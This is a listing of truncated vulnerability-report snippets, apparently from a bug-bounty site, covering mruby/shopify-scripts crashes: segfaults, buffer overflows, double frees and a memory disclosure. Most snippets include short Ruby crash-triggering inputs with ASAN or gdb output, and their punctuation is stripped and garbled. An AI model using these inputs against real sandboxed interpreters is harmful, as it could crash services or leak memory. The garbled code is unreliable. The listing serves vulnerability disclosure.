20 matches found
shopify-scripts: SEGV on ary_concat
The following input demonstrates a crash: def z return begin 0.each do return end rescue = x ensure x.backtrace end end z ASAN report ./mruby/bin/mruby asd.rb ASAN:DEADLYSIGNAL ================================================================= ==43761==ERROR: AddressSanitizer: SEGV on unknown...
shopify-scripts: heap-buffer-overflow in OP_R_BREAK
The following input demonstrates a crash: def z e Array = a rescue lambda yield end z break Array ASAN report: ./mruby/bin/mirb 2084out.rb mirb - Embeddable Interactive Ruby Shell = :z = nil mirb:6: undefined method 'e' for main NoMethodError = nil...
shopify-scripts: mirb only: stack-buffer-overflow (OOB write) in main()
Triggered in 7e28510 7 April 2017 with mirb only. cat test013.rb | mirb ==17976==ERROR: AddressSanitizer: stack-buffer-overflow on address 0x7fffeb477fb0 at pc 0x408c21 bp 0x7fffeb477a90 sp 0x7fffeb477a88 WRITE of size 1 at 0x7fffeb477fb0 thread T0 0 0x408c20 in main...
shopify-scripts: SIGSEGV in mrb_str_inum
PoC ------------------- The following code triggers the bug attached as testmrbstrinum.rb: def methodmissingfalse end def tostr""end Integerÿ,2.h Debug - mirb ------------------- x@x:/Desktop/test/mruby/bin$ gdb -q ./mirb r Reading symbols from ./mirb...idone. gdb r testmrbstrinum.rb Starting...
shopify-scripts: SIGABRT - in free
PoC ------------------- The following code triggers the bug attached as free.rb: a= h=""=0 ha,"h00000000h000000=0000000 0000ht00000=00t0000 0000h000000=000000 00000"=0 a0="z" ha,"h00000000h000000=0000000 0000ht00000=00t0000 0000h000000=000000 00000"=0 h.dup Backtrace - mirb -------------------...
shopify-scripts: SIGSEGV in mrb_class
PoC ------------------- Attached as testmrbclass.rb: Debug - mirb ------------------- Program received signal SIGSEGV, Segmentation fault. 0x0000000000402ef2 in mrbclass mrb=0x6b0010, v=... at /home/x/Desktop/test/mruby/include/mruby/class.h:50 50 return mrbobjptrv-c; gdb l 45 case MRBTTCPTR: 46...
shopify-scripts: SIGSEGV in mrb_vm_exec
PoC ------------------- The following code triggers the bug attached as testmrbvmexec.rb: s=proc|f,g,x|fxgx.curry k=proc|x,y|x.curry i=proc|x|x.curry fi0= re0=proc|x|fi0.size;x.curry ssiiki0sskssksssksskskre0skskkksksk Debug - mirb ------------------- x@x:/Desktop/test/mruby/bin$ gdb -q ./mirb...
shopify-scripts: SIGABRT - mirb - Double Free
PoC ------------------- Attached as test.rb Debug - mirb ------------------- x@x:/Desktop/test/mruby/bin$ gdb -q ./mirb r Reading symbols from ./mirb...done. gdb r test.rb Starting program: /home/x/Desktop/test/mruby/bin/mirb test.rb mirb - Embeddable Interactive Ruby Shell NoMethodError: undefin...
shopify-scripts: SIGABRT - mirb and mruby
PoC ------------------- The following code triggers the bug attached as test.rb: def methodmissingm,e self.ff||=00end e Debug - mirb ------------------- x@x:/Desktop/test/mruby/bin$ gdb -q ./mirb Reading symbols from ./mirb...done. gdb r test.rb Starting program: /home/x/Desktop/test/mruby/bin/mi...
shopify-scripts: SIGSEGV in str_buf_cat
PoC ------------------- Attached as teststrbufcat.rb Debug - mirb ------------------- Program received signal SIGSEGV, Segmentation fault. memcpysse2unaligned at ../sysdeps/x8664/multiarch/memcpy-sse2-unaligned.S:36 36 ../sysdeps/x8664/multiarch/memcpy-sse2-unaligned.S: No such file or directory...
shopify-scripts: SIGABRT in only mirb
PoC ------------------- The following code triggers the bug attached as test.rb: def tostr 00end 0.times Debug - mirb ------------------- The program being debugged has been started already. Start it from the beginning? y or n y Starting program: /home/x/Desktop/test/mruby/bin/mirb test.rb mirb -...
shopify-scripts: SIGSEGV - mark_context_stack
PoC ------------------- The following code triggers the bug attached as testmarkcontextstack.rb: def one tooyieldend def too yield ensure onebreakend one Debug - mirb ------------------- Starting program: /home/x/Desktop/test/mruby/bin/mirb testmarkcontextstack mirb - Embeddable Interactive Ruby...
shopify-scripts: SIGABRT - method_missing - mark_context_stack
PoC ------------------- The following code triggers the bug attached as testmethodmissing.rb: def methodmissinge,0.n||=0 00end b Debug - mirb ------------------- gdb r testmethodmissing.rb Starting program: /home/x/Desktop/research/test/mruby/bin/mirb testmethodmissing.rb mirb - Embeddable...
shopify-scripts: SIGSEGV - mrb_vm_exec - line:1312
PoC ------------------- The following code triggers the bug attached as mrbvmexec.rb: n s s k h GC.start ObjectSpace.eachobject|obj|obj Debug - mirb ------------------- gdb r mrbvmexec.rb The program being debugged has been started already. Start it from the beginning? y or n y Starting program:...
shopify-scripts: SIGSEGV - vm.c - line:1214
PoC ------------------- The following code triggers the bug attached as testmrbvmexec1214.rb: def test instanceexec do return toenum:==end ensure end test Debug - mirb ------------------- gdb r testmrbvmexec1214.rb Starting program: /home/x/Desktop/research/3fuzz/mruby/bin/mirb testmrbvmexec1214....
shopify-scripts: SIGSEGV - mrb_obj_extend - line:413
PoC: ------------------- The following code triggers the bug attached as testmrbobjextend413.rb: module Test end def methodmissingsextendTestend def setva.set0end set0 Mirb - Debug: ------------------- gdb r testmrbobjextend413.rb The program being debugged has been started already. Start it from...
shopify-scripts: SIGSEGV - mrb_vm_exec - line:1681
PoC: ------------------- The following code triggers the bug attached as testmrbvmexec1681.rb: def try yield ensure yield end a=lambda do a.try do return end end.call Mirb - Debug: ------------------- gdb r testmrbvmexec1678.rb The program being debugged has been started already. Start it from th...
shopify-scripts: SIGSEGV - kh_resize_iv - Null Deref
PoC --------------------- The following code triggers the bug attached as khresizeiv.rb: l t'',''doend s'',''do.end d t''do.end a=Array.new a.=102,0 € s a.tos a a.tos a.i Debug - mirb --------------------- gdb r khresizeiv.rb Starting program: /home/x/Desktop/research/mruby/bin/mirb khresizeiv.rb...
shopify-scripts: SIGSEGV - mrb_check_intern_str() - NullPointer
PoC --------------------- The following code triggers the bug attached as mrbvmexec.rb: def tostr $s.replace""end $s="" class Test00espondTo end Test00espondTo.respondto?0 Crash - mirb --------------------- x@x:/Desktop/research/mruby/bin$ ./mirb mrbcheckinternstr.rb mirb - Embeddable Interactive...
shopify-scripts: Memory disclosure in timegm
An attacker may disclose memory and/or crash mirb. PoC ruby @a = '' for i in 0..50 do t = Time.new1970, 12 + i + 1.toi - Time.new1970, 12 + i.toi @a = 0..50 = nil = "28de80 28de80 263b80 28de80 278d00 28de80 278d00 28de80 28de80 278d00 28de80 278d00 28de80 49dab380 ee655600 feabe80 98ee00 9facec8...